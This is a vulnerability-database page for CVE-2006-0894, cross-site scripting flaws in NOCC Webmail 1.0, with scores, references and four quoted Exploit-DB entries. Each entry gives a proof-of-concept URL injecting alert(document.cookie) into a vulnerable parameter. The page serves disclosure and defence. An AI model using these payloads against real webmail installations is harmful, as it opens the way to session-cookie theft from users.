CVE-2006-0894
published 2006-02-25CVE-2006-0894: Multiple cross-site scripting (XSS) vulnerabilities in NOCC Webmail 1.0 allow remote attackers to inject arbitrary web script or HTML via (1) the…
PriorityP419medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
2.63%
83.6th percentile
Multiple cross-site scripting (XSS) vulnerabilities in NOCC Webmail 1.0 allow remote attackers to inject arbitrary web script or HTML via (1) the html_error_occurred parameter in error.php, (2) html_filter_select parameter in filter_prefs.php, (3) html_no_mail parameter in no_mail.php, the (4) page_line, (5) prev, and (6) next parameters in html_bottom_table.php, and the (7) _SESSION['nocc_theme'] parameter in footer.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nocc | nocc | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
NOCC 1.0 - 'filter_prefs.php?html_filter_select' Cross-Site Scripting
exploitdb·2006-02-23
CVE-2006-0894 NOCC 1.0 - 'filter_prefs.php?html_filter_select' Cross-Site Scripting
NOCC 1.0 - 'filter_prefs.php?html_filter_select' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/16793/info
NOCC Webmail is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to inject arbitrary PHP code and execute it in the context of the vulnerable webserver. An attacker can also exploit these issues to execute arbitrary HTML or script code in the browser of a victim user in the context of the webserver process. This may facilitate the theft of cookie-based authentication credentials; other attacks are also possible.
http://www.example.com/[path]/html/filter_prefs.php?html_filter_select=alert(document.cookie)
Exploit-DB
NOCC 1.0 - 'html_bottom_table.php' Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2006-02-23
CVE-2006-0894 NOCC 1.0 - 'html_bottom_table.php' Multiple Cross-Site Scripting Vulnerabilities
NOCC 1.0 - 'html_bottom_table.php' Multiple Cross-Site Scripting Vulnerabilities
---
source: https://www.securityfocus.com/bid/16793/info
NOCC Webmail is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to inject arbitrary PHP code and execute it in the context of the vulnerable webserver. An attacker can also exploit these issues to execute arbitrary HTML or script code in the browser of a victim user in the context of the webserver process. This may facilitate the theft of cookie-based authentication credentials; other attacks are also possible.
http://www.example.com/[path]/html/html_bottom_table.php?page_line=alert(document.cookie)
http://www.examp
Exploit-DB
NOCC 1.0 - 'error.php?html_error_occurred' Cross-Site Scripting
exploitdb·2006-02-23
CVE-2006-0894 NOCC 1.0 - 'error.php?html_error_occurred' Cross-Site Scripting
NOCC 1.0 - 'error.php?html_error_occurred' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/16793/info
NOCC Webmail is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to inject arbitrary PHP code and execute it in the context of the vulnerable webserver. An attacker can also exploit these issues to execute arbitrary HTML or script code in the browser of a victim user in the context of the webserver process. This may facilitate the theft of cookie-based authentication credentials; other attacks are also possible.
http://www.example.com/[path]/html/error.php?html_error_occurred=alert(document.cookie)
Exploit-DB
NOCC 1.0 - 'no_mail.php?html_no_mail' Cross-Site Scripting
exploitdb·2006-02-23
CVE-2006-0894 NOCC 1.0 - 'no_mail.php?html_no_mail' Cross-Site Scripting
NOCC 1.0 - 'no_mail.php?html_no_mail' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/16793/info
NOCC Webmail is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to inject arbitrary PHP code and execute it in the context of the vulnerable webserver. An attacker can also exploit these issues to execute arbitrary HTML or script code in the browser of a victim user in the context of the webserver process. This may facilitate the theft of cookie-based authentication credentials; other attacks are also possible.
http://www.example.com/[path]/html/no_mail.php?html_no_mail=alert(document.cookie)
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2006-02/0418.htmlhttp://retrogod.altervista.org/noccw_10_incl_xpl.htmlhttp://secunia.com/advisories/16921http://securitytracker.com/id?1015671http://www.osvdb.org/23423http://www.osvdb.org/23424http://www.osvdb.org/23425http://www.osvdb.org/23426http://www.osvdb.org/23427http://www.securityfocus.com/bid/16793http://archives.neohapsis.com/archives/bugtraq/2006-02/0418.htmlhttp://retrogod.altervista.org/noccw_10_incl_xpl.htmlhttp://secunia.com/advisories/16921http://securitytracker.com/id?1015671http://www.osvdb.org/23423http://www.osvdb.org/23424http://www.osvdb.org/23425http://www.osvdb.org/23426http://www.osvdb.org/23427http://www.securityfocus.com/bid/16793
2006-02-25
Published